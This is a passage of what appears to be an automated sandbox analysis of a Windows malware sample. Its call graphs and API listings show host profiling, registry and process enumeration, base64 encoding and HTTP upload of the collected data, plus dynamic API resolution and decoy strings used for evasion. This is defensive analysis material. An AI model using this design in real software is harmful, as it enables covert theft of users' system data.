6ea8a0 lstrcpy 15195->15196 15197 6e215a 15196->15197 15198 6ea9b0 4 API calls 15197->15198 15199 6e217b 15198->15199 15200 6ea8a0 lstrcpy 15199->15200 15201 6e2184 15200->15201 15795 6e7f60 15201->15795 15204 6ea9b0 4 API calls 15205 6e21a4 15204->15205 15206 6ea8a0 lstrcpy 15205->15206 15207 6e21ad 15206->15207 15208 6ea9b0 4 API calls 15207->15208 15209 6e21cc 15208->15209 15210 6ea8a0 lstrcpy 15209->15210 15211 6e21d5 15210->15211 15212 6ea9b0 4 API calls 15211->15212 15213 6e21f6 15212->15213 15214 6ea8a0 lstrcpy 15213->15214 15215 6e21ff 15214->15215 15808 6e7ed0 GetSystemInfo wsprintfA 15215->15808 15218 6ea9b0 4 API calls 15219 6e221f 15218->15219 15220 6ea8a0 lstrcpy 15219->15220 15221 6e2228 15220->15221 15222 6ea9b0 4 API calls 15221->15222 15223 6e2247 15222->15223 15224 6ea8a0 lstrcpy 15223->15224 15225 6e2250 15224->15225 15226 6ea9b0 4 API calls 15225->15226 15227 6e2270 15226->15227 15228 6ea8a0 lstrcpy 15227->15228 15229 6e2279 15228->15229 15810 6e8100 GetProcessHeap RtlAllocateHeap 15229->15810 15232 6ea9b0 4 API calls 15233 6e2299 15232->15233 15234 6ea8a0 lstrcpy 15233->15234 15235 6e22a2 15234->15235 15236 6ea9b0 4 API calls 15235->15236 15237 6e22c1 15236->15237 15238 6ea8a0 lstrcpy 15237->15238 15239 6e22ca 15238->15239 15240 6ea9b0 4 API calls 15239->15240 15241 6e22eb 15240->15241 15242 6ea8a0 lstrcpy 15241->15242 15243 6e22f4 15242->15243 15816 6e87c0 15243->15816 15246 6ea920 3 API calls 15247 6e231e 15246->15247 15248 6ea8a0 lstrcpy 15247->15248 15249 6e2327 15248->15249 15250 6ea9b0 4 API calls 15249->15250 15251 6e2351 15250->15251 15252 6ea8a0 lstrcpy 15251->15252 15253 6e235a 15252->15253 15254 6ea9b0 4 API calls 15253->15254 15255 6e237a 15254->15255 15256 6ea8a0 lstrcpy 15255->15256 15257 6e2383 15256->15257 15258 6ea9b0 4 API calls 15257->15258 15259 6e23a2 15258->15259 15260 6ea8a0 lstrcpy 15259->15260 15261 6e23ab 15260->15261 15821 6e81f0 15261->15821 15263 6e23c2 15264 6ea920 3 API calls 15263->15264 15265 6e23d5 15264->15265 15266 6ea8a0 lstrcpy 15265->15266 15267 6e23de 15266->15267 15268 6ea9b0 4 API calls 15267->15268 15269 6e240a 15268->15269 15270 6ea8a0 lstrcpy 15269->15270 15271 6e2413 15270->15271 15272 6ea9b0 4 API calls 15271->15272 15273 6e2432 15272->15273 15274 6ea8a0 lstrcpy 15273->15274 15275 6e243b 15274->15275 15276 6ea9b0 4 API calls 15275->15276 15277 6e245c 15276->15277 15278 6ea8a0 lstrcpy 15277->15278 15279 6e2465 15278->15279 15280 6ea9b0 4 API calls 15279->15280 15281 6e2484 15280->15281 15282 6ea8a0 lstrcpy 15281->15282 15283 6e248d 15282->15283 15284 6ea9b0 4 API calls 15283->15284 15285 6e24ae 15284->15285 15286 6ea8a0 lstrcpy 15285->15286 15287 6e24b7 15286->15287 15829 6e8320 15287->15829 15289 6e24d3 15290 6ea920 3 API calls 15289->15290 15291 6e24e6 15290->15291 15292 6ea8a0 lstrcpy 15291->15292 15293 6e24ef 15292->15293 15294 6ea9b0 4 API calls 15293->15294 15295 6e2519 15294->15295 15296 6ea8a0 lstrcpy 15295->15296 15297 6e2522 15296->15297 15298 6ea9b0 4 API calls 15297->15298 15299 6e2543 15298->15299 15300 6ea8a0 lstrcpy 15299->15300 15301 6e254c 15300->15301 15302 6e8320 17 API calls 15301->15302 15303 6e2568 15302->15303 15304 6ea920 3 API calls 15303->15304 15305 6e257b 15304->15305 15306 6ea8a0 lstrcpy 15305->15306 15307 6e2584 15306->15307 15308 6ea9b0 4 API calls 15307->15308 15309 6e25ae 15308->15309 15310 6ea8a0 lstrcpy 15309->15310 15311 6e25b7 15310->15311 15312 6ea9b0 4 API calls 15311->15312 15313 6e25d6 15312->15313 15314 6ea8a0 lstrcpy 15313->15314 15315 6e25df 15314->15315 15316 6ea9b0 4 API calls 15315->15316 15317 6e2600 15316->15317 15318 6ea8a0 lstrcpy 15317->15318 15319 6e2609 15318->15319 15865 6e8680 15319->15865 15321 6e2620 15322 6ea920 3 API calls 15321->15322 15323 6e2633 15322->15323 15324 6ea8a0 lstrcpy 15323->15324 15325 6e263c 15324->15325 15326 6e265a lstrlen 15325->15326 15327 6e266a 15326->15327 15328 6ea740 lstrcpy 15327->15328 15329 6e267c 15328->15329 15330 6d1590 lstrcpy 15329->15330 15331 6e268d 15330->15331 15875 6e5190 15331->15875 15333 6e2699 15333->13765 16063 6eaad0 15334->16063 15336 6d5009 InternetOpenUrlA 15340 6d5021 15336->15340 15337 6d502a InternetReadFile 15337->15340 15338 6d50a0 InternetCloseHandle InternetCloseHandle 15339 6d50ec 15338->15339 15339->13769 15340->15337 15340->15338 16064 6d98d0 15341->16064 15343 6e0759 15344 6e0a38 15343->15344 15345 6e077d 15343->15345 15346 6d1590 lstrcpy 15344->15346 15347 6e0799 StrCmpCA 15345->15347 15348 6e0a49 15346->15348 15349 6e07a8 15347->15349 15350 6e0843 15347->15350 16240 6e0250 15348->16240 15352 6ea7a0 lstrcpy 15349->15352 15355 6e0865 StrCmpCA 15350->15355 15354 6e07c3 15352->15354 15357 6d1590 lstrcpy 15354->15357 15356 6e0874 15355->15356 15393 6e096b 15355->15393 15358 6ea740 lstrcpy 15356->15358 15359 6e080c 15357->15359 15361 6e0881 15358->15361 15362 6ea7a0 lstrcpy 15359->15362 15360 6e099c StrCmpCA 15363 6e09ab 15360->15363 15364 6e0a2d 15360->15364 15365 6ea9b0 4 API calls 15361->15365 15366 6e0823 15362->15366 15367 6d1590 lstrcpy 15363->15367 15364->13773 15368 6e08ac 15365->15368 15369 6ea7a0 lstrcpy 15366->15369 15370 6e09f4 15367->15370 15371 6ea920 3 API calls 15368->15371 15372 6e083e 15369->15372 15373 6ea7a0 lstrcpy 15370->15373 15374 6e08b3 15371->15374 16067 6dfb00 15372->16067 15376 6e0a0d 15373->15376 15377 6ea9b0 4 API calls 15374->15377 15378 6ea7a0 lstrcpy 15376->15378 15379 6e08ba 15377->15379 15380 6e0a28 15378->15380 15381 6ea8a0 lstrcpy 15379->15381 16183 6e0030 15380->16183 15393->15360 15715 6ea7a0 lstrcpy 15714->15715 15716 6d1683 15715->15716 15717 6ea7a0 lstrcpy 15716->15717 15718 6d1695 15717->15718 15719 6ea7a0 lstrcpy 15718->15719 15720 6d16a7 15719->15720 15721 6ea7a0 lstrcpy 15720->15721 15722 6d15a3 15721->15722 15722->14596 15724 6d47c6 15723->15724 15725 6d4838 lstrlen 15724->15725 15749 6eaad0 15725->15749 15727 6d4848 InternetCrackUrlA 15728 6d4867 15727->15728 15728->14673 15730 6ea740 lstrcpy 15729->15730 15731 6e8b74 15730->15731 15732 6ea740 lstrcpy 15731->15732 15733 6e8b82 GetSystemTime 15732->15733 15735 6e8b99 15733->15735 15734 6ea7a0 lstrcpy 15736 6e8bfc 15734->15736 15735->15734 15736->14688 15738 6ea931 15737->15738 15739 6ea988 15738->15739 15741 6ea968 lstrcpy lstrcat 15738->15741 15740 6ea7a0 lstrcpy 15739->15740 15742 6ea994 15740->15742 15741->15739 15742->14691 15743->14806 15745 6d9af9 LocalAlloc 15744->15745 15746 6d4eee 15744->15746 15745->15746 15747 6d9b14 CryptStringToBinaryA 15745->15747 15746->14694 15746->14697 15747->15746 15748 6d9b39 LocalFree 15747->15748 15748->15746 15749->15727 15750->14816 15751->14957 15752->14959 15753->14967 15882 6e77a0 15754->15882 15757 6e1c1e 15757->15049 15758 6e76c6 RegOpenKeyExA 15759 6e76e7 RegQueryValueExA 15758->15759 15760 6e7704 RegCloseKey 15758->15760 15759->15760 15760->15757 15762 6e1c99 15761->15762 15762->15063 15764 6e1e09 15763->15764 15764->15105 15766 6e7a9a wsprintfA 15765->15766 15767 6e1e84 15765->15767 15766->15767 15767->15119 15769 6e7b4d 15768->15769 15770 6e1efe 15768->15770 15889 6e8d20 LocalAlloc CharToOemW 15769->15889 15770->15133 15773 6ea740 lstrcpy 15772->15773 15774 6e7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15773->15774 15781 6e7c25 15774->15781 15775 6e7d18 15777 6e7d1e LocalFree 15775->15777 15778 6e7d28 15775->15778 15776 6e7c46 GetLocaleInfoA 15776->15781 15777->15778 15780 6ea7a0 lstrcpy 15778->15780 15779 6ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15779->15781 15783 6e7d37 15780->15783 15781->15775 15781->15776 15781->15779 15782 6ea8a0 lstrcpy 15781->15782 15782->15781 15783->15146 15785 6e2008 15784->15785 15785->15161 15787 6e94b5 15786->15787 15788 6e9493 GetModuleFileNameExA CloseHandle 15786->15788 15789 6ea740 lstrcpy 15787->15789 15788->15787 15790 6e2091 15789->15790 15790->15176 15792 6e7e68 RegQueryValueExA 15791->15792 15793 6e2119 15791->15793 15794 6e7e8e RegCloseKey 15792->15794 15793->15190 15794->15793 15796 6e7fb9 GetLogicalProcessorInformationEx 15795->15796 15797 6e7fd8 GetLastError 15796->15797 15798 6e8029 15796->15798 15805 6e8022 15797->15805 15807 6e7fe3 15797->15807 15803 6e89f0 2 API calls 15798->15803 15801 6e89f0 2 API calls 15802 6e2194 15801->15802 15802->15204 15804 6e807b 15803->15804 15804->15805 15806 6e8084 wsprintfA 15804->15806 15805->15801 15805->15802 15806->15802 15807->15796 15807->15802 15890 6e89f0 15807->15890 15893 6e8a10 GetProcessHeap RtlAllocateHeap 15807->15893 15809 6e220f 15808->15809 15809->15218 15811 6e89b0 15810->15811 15812 6e814d GlobalMemoryStatusEx 15811->15812 15813 6e8163 __aulldiv 15812->15813 15814 6e819b wsprintfA 15813->15814 15815 6e2289 15814->15815 15815->15232 15817 6e87fb GetProcessHeap RtlAllocateHeap wsprintfA 15816->15817 15819 6ea740 lstrcpy 15817->15819 15820 6e230b 15819->15820 15820->15246 15822 6ea740 lstrcpy 15821->15822 15826 6e8229 15822->15826 15823 6e8263 15825 6ea7a0 lstrcpy 15823->15825 15824 6ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15824->15826 15827 6e82dc 15825->15827 15826->15823 15826->15824 15828 6ea8a0 lstrcpy 15826->15828 15827->15263 15828->15826 15830 6ea740 lstrcpy 15829->15830 15831 6e835c RegOpenKeyExA 15830->15831 15832 6e83ae 15831->15832 15833 6e83d0 15831->15833 15834 6ea7a0 lstrcpy 15832->15834 15835 6e83f8 RegEnumKeyExA 15833->15835 15836 6e8613 RegCloseKey 15833->15836 15845 6e83bd 15834->15845 15838 6e860e 15835->15838 15839 6e843f wsprintfA RegOpenKeyExA 15835->15839 15837 6ea7a0 lstrcpy 15836->15837 15837->15845 15838->15836 15840 6e8485 RegCloseKey RegCloseKey 15839->15840 15841 6e84c1 RegQueryValueExA 15839->15841 15842 6ea7a0 lstrcpy 15840->15842 15843 6e84fa lstrlen 15841->15843 15844 6e8601 RegCloseKey 15841->15844 15842->15845 15843->15844 15846 6e8510 15843->15846 15844->15838 15845->15289 15847 6ea9b0 4 API calls 15846->15847 15848 6e8527 15847->15848 15849 6ea8a0 lstrcpy 15848->15849 15850 6e8533 15849->15850 15851 6ea9b0 4 API calls 15850->15851 15852 6e8557 15851->15852 15853 6ea8a0 lstrcpy 15852->15853 15854 6e8563 15853->15854 15855 6e856e RegQueryValueExA 15854->15855 15855->15844 15856 6e85a3 15855->15856 15857 6ea9b0 4 API calls 15856->15857 15858 6e85ba 15857->15858 15859 6ea8a0 lstrcpy 15858->15859 15860 6e85c6 15859->15860 15861 6ea9b0 4 API calls 15860->15861 15862 6e85ea 15861->15862 15863 6ea8a0 lstrcpy 15862->15863 15864 6e85f6 15863->15864 15864->15844 15866 6ea740 lstrcpy 15865->15866 15867 6e86bc CreateToolhelp32Snapshot Process32First 15866->15867 15868 6e875d CloseHandle 15867->15868 15869 6e86e8 Process32Next 15867->15869 15870 6ea7a0 lstrcpy 15868->15870 15869->15868 15874 6e86fd 15869->15874 15871 6e8776 15870->15871 15871->15321 15872 6ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15872->15874 15873 6ea8a0 lstrcpy 15873->15874 15874->15869 15874->15872 15874->15873 15876 6ea7a0 lstrcpy 15875->15876 15877 6e51b5 15876->15877 15878 6d1590 lstrcpy 15877->15878 15879 6e51c6 15878->15879 15894 6d5100 15879->15894 15881 6e51cf 15881->15333 15885 6e7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15882->15885 15884 6e76b9 15884->15757 15884->15758 15886 6e7765 RegQueryValueExA 15885->15886 15887 6e7780 RegCloseKey 15885->15887 15886->15887 15888 6e7793 15887->15888 15888->15884 15889->15770 15891 6e8a0c 15890->15891 15892 6e89f9 GetProcessHeap HeapFree 15890->15892 15891->15807 15892->15891 15893->15807 15895 6ea7a0 lstrcpy 15894->15895 15896 6d5119 15895->15896 15897 6d47b0 2 API calls 15896->15897 15898 6d5125 15897->15898 16054 6e8ea0 15898->16054 15900 6d5184 15901 6d5192 lstrlen 15900->15901 15902 6d51a5 15901->15902 15903 6e8ea0 4 API calls 15902->15903 15904 6d51b6 15903->15904 15905 6ea740 lstrcpy 15904->15905 15906 6d51c9 15905->15906 15907 6ea740 lstrcpy 15906->15907 15908 6d51d6 15907->15908 15909 6ea740 lstrcpy 15908->15909 15910 6d51e3 15909->15910 15911 6ea740 lstrcpy 15910->15911 15912 6d51f0 15911->15912 15913 6ea740 lstrcpy 15912->15913 15914 6d51fd InternetOpenA StrCmpCA 15913->15914 15915 6d522f 15914->15915 15916 6d58c4 InternetCloseHandle 15915->15916 15917 6e8b60 3 API calls 15915->15917 15923 6d58d9 ctype 15916->15923 15918 6d524e 15917->15918 15919 6ea920 3 API calls 15918->15919 15920 6d5261 15919->15920 15921 6ea8a0 lstrcpy 15920->15921 15922 6d526a 15921->15922 15924 6ea9b0 4 API calls 15922->15924 15927 6ea7a0 lstrcpy 15923->15927 15925 6d52ab 15924->15925 15926 6ea920 3 API calls 15925->15926 15928 6d52b2 15926->15928 15935 6d5913 15927->15935 15929 6ea9b0 4 API calls 15928->15929 15930 6d52b9 15929->15930 15931 6ea8a0 lstrcpy 15930->15931 15932 6d52c2 15931->15932 15933 6ea9b0 4 API calls 15932->15933 15934 6d5303 15933->15934 15936 6ea920 3 API calls 15934->15936 15935->15881 15937 6d530a 15936->15937 15938 6ea8a0 lstrcpy 15937->15938 15939 6d5313 15938->15939 15940 6d5329 InternetConnectA 15939->15940 15940->15916 15941 6d5359 HttpOpenRequestA 15940->15941 15943 6d58b7 InternetCloseHandle 15941->15943 15944 6d53b7 15941->15944 15943->15916 15945 6ea9b0 4 API calls 15944->15945 15946 6d53cb 15945->15946 15947 6ea8a0 lstrcpy 15946->15947 15948 6d53d4 15947->15948 15949 6ea920 3 API calls 15948->15949 15950 6d53f2 15949->15950 15951 6ea8a0 lstrcpy 15950->15951 15952 6d53fb 15951->15952 15953 6ea9b0 4 API calls 15952->15953 15954 6d541a 15953->15954 15955 6ea8a0 lstrcpy 15954->15955 15956 6d5423 15955->15956 15957 6ea9b0 4 API calls 15956->15957 15958 6d5444 15957->15958 15959 6ea8a0 lstrcpy 15958->15959 15960 6d544d 15959->15960 15961 6ea9b0 4 API calls 15960->15961 15962 6d546e 15961->15962 15963 6ea8a0 lstrcpy 15962->15963 16055 6e8ead CryptBinaryToStringA 16054->16055 16056 6e8ea9 16054->16056 16055->16056 16057 6e8ece GetProcessHeap RtlAllocateHeap 16055->16057 16056->15900 16057->16056 16058 6e8ef4 ctype 16057->16058 16059 6e8f05 CryptBinaryToStringA 16058->16059 16059->16056 16063->15336 16306 6d9880 16064->16306 16066 6d98e1 16066->15343 16068 6ea740 lstrcpy 16067->16068 16069 6dfb16 16068->16069 16241 6ea740 lstrcpy 16240->16241 16242 6e0266 16241->16242 16243 6e8de0 2 API calls 16242->16243 16244 6e027b 16243->16244 16245 6ea920 3 API calls 16244->16245 16246 6e028b 16245->16246 16247 6ea8a0 lstrcpy 16246->16247 16248 6e0294 16247->16248 16249 6ea9b0 4 API calls 16248->16249 16250 6e02b8 16249->16250 16307 6d988e 16306->16307 16310 6d6fb0 16307->16310 16309 6d98ad ctype 16309->16066 16313 6d6d40 16310->16313 16314 6d6d59 16313->16314 16315 6d6d63 16313->16315 16314->16309 16315->16314 16327 6d6660 16315->16327 16317 6d6dbe 16317->16314 16333 6d69b0 16317->16333 16319 6d6e2a 16319->16314 16320 6d6ef7 16319->16320 16321 6d6ee6 VirtualFree 16319->16321 16322 6d6f38 16320->16322 16323 6d6f26 FreeLibrary 16320->16323 16326 6d6f41 16320->16326 16321->16320 16325 6e89f0 2 API calls 16322->16325 16323->16320 16324 6e89f0 2 API calls 16324->16314 16325->16326 16326->16314 16326->16324 16332 6d668f VirtualAlloc 16327->16332 16329 6d6730 16330 6d673c 16329->16330 16331 6d6743 VirtualAlloc 16329->16331 16330->16317 16331->16330 16332->16329 16332->16330 16334 6d69c9 16333->16334 16338 6d69d5 16333->16338 16335 6d6a09 LoadLibraryA 16334->16335 16334->16338 16336 6d6a32 16335->16336 16335->16338 16340 6d6ae0 16336->16340 16343 6e8a10 GetProcessHeap RtlAllocateHeap 16336->16343 16338->16319 16339 6d6ba8 GetProcAddress 16339->16338 16339->16340 16340->16338 16340->16339 16341 6e89f0 2 API calls 16341->16340 16342 6d6a8b 16342->16338 16342->16341 16343->16342

                        Executed Functions

                        Function 006E9860 Relevance: 82.5, APIs: 33, Strings: 14, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 6e9860-6e9874 call 6e9750 663 6e987a-6e9a8e call 6e9780 GetProcAddress * 21 660->663 664 6e9a93-6e9af2 LoadLibraryA * 5 660->664 663->664 665 6e9b0d-6e9b14 664->665 666 6e9af4-6e9b08 GetProcAddress 664->666 669 6e9b46-6e9b4d 665->669 670 6e9b16-6e9b41 GetProcAddress * 2 665->670 666->665 671 6e9b4f-6e9b63 GetProcAddress 669->671 672 6e9b68-6e9b6f 669->672 670->669 671->672 673 6e9b89-6e9b90 672->673 674 6e9b71-6e9b84 GetProcAddress 672->674 675 6e9b92-6e9bbc GetProcAddress * 2 673->675 676 6e9bc1-6e9bc2 673->676 674->673 675->676
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E42458), ref: 006E98A1
                        • GetProcAddress.KERNEL32(74DD0000,00E42398), ref: 006E98BA
                        • GetProcAddress.KERNEL32(74DD0000,00E42470), ref: 006E98D2
                        • GetProcAddress.KERNEL32(74DD0000,00E422A8), ref: 006E98EA
                        • GetProcAddress.KERNEL32(74DD0000,00E42380), ref: 006E9903
                        • GetProcAddress.KERNEL32(74DD0000,00E48F48), ref: 006E991B
                        • GetProcAddress.KERNEL32(74DD0000,00E35D30), ref: 006E9933
                        • GetProcAddress.KERNEL32(74DD0000,00E35CF0), ref: 006E994C
                        • GetProcAddress.KERNEL32(74DD0000,00E42218), ref: 006E9964
                        • GetProcAddress.KERNEL32(74DD0000,00E42500), ref: 006E997C
                        • GetProcAddress.KERNEL32(74DD0000,00E422C0), ref: 006E9995
                        • GetProcAddress.KERNEL32(74DD0000,00E422D8), ref: 006E99AD
                        • GetProcAddress.KERNEL32(74DD0000,00E35B50), ref: 006E99C5
                        • GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 006E99DE
                        • GetProcAddress.KERNEL32(74DD0000,00E42488), ref: 006E99F6
                        • GetProcAddress.KERNEL32(74DD0000,00E35B70), ref: 006E9A0E
                        • GetProcAddress.KERNEL32(74DD0000,00E42338), ref: 006E9A27
                        • GetProcAddress.KERNEL32(74DD0000,00E423B0), ref: 006E9A3F
                        • GetProcAddress.KERNEL32(74DD0000,00E35D70), ref: 006E9A57
                        • GetProcAddress.KERNEL32(74DD0000,00E423C8), ref: 006E9A70
                        • GetProcAddress.KERNEL32(74DD0000,00E35AB0), ref: 006E9A88
                        • LoadLibraryA.KERNEL32(00E42530,?,006E6A00), ref: 006E9A9A
                        • LoadLibraryA.KERNEL32(00E42560,?,006E6A00), ref: 006E9AAB
                        • LoadLibraryA.KERNEL32(00E425A8,?,006E6A00), ref: 006E9ABD
                        • LoadLibraryA.KERNEL32(00E42590,?,006E6A00), ref: 006E9ACF
                        • LoadLibraryA.KERNEL32(00E42548,?,006E6A00), ref: 006E9AE0
                        • GetProcAddress.KERNEL32(75A70000,00E425D8), ref: 006E9B02
                        • GetProcAddress.KERNEL32(75290000,00E42578), ref: 006E9B23
                        • GetProcAddress.KERNEL32(75290000,00E425C0), ref: 006E9B3B
                        • GetProcAddress.KERNEL32(75BD0000,00E42518), ref: 006E9B5D
                        • GetProcAddress.KERNEL32(75450000,00E35DB0), ref: 006E9B7E
                        • GetProcAddress.KERNEL32(76E90000,00E490F8), ref: 006E9B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 006E9BB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: #$0%$0]$8#$H%$NtQueryInformationProcess$P[$X$$`"$`%$p$$p[$p]$x%
                        • API String ID: 2238633743-152105285
                        • Opcode ID: eccdd903d5d6e37485247c1421ebb1495761d4e36900a794e8594fbcfc61cdae
                        • Instruction ID: f38991995ee26b9a88caaa1157bd9e1ffa770b84d8379292fe290d9ba5d66713
                        • Opcode Fuzzy Hash: eccdd903d5d6e37485247c1421ebb1495761d4e36900a794e8594fbcfc61cdae
                        • Instruction Fuzzy Hash: 96A19EB5B3E2409FD344EFA8EE889E637F9F74C310704C55AA605C32A5D6399D42EB12
                        Function 006D45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 6d45c0-6d4695 RtlAllocateHeap 781 6d46a0-6d46a6 764->781 782 6d46ac-6d474a 781->782 783 6d474f-6d47a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 006D479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4657
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
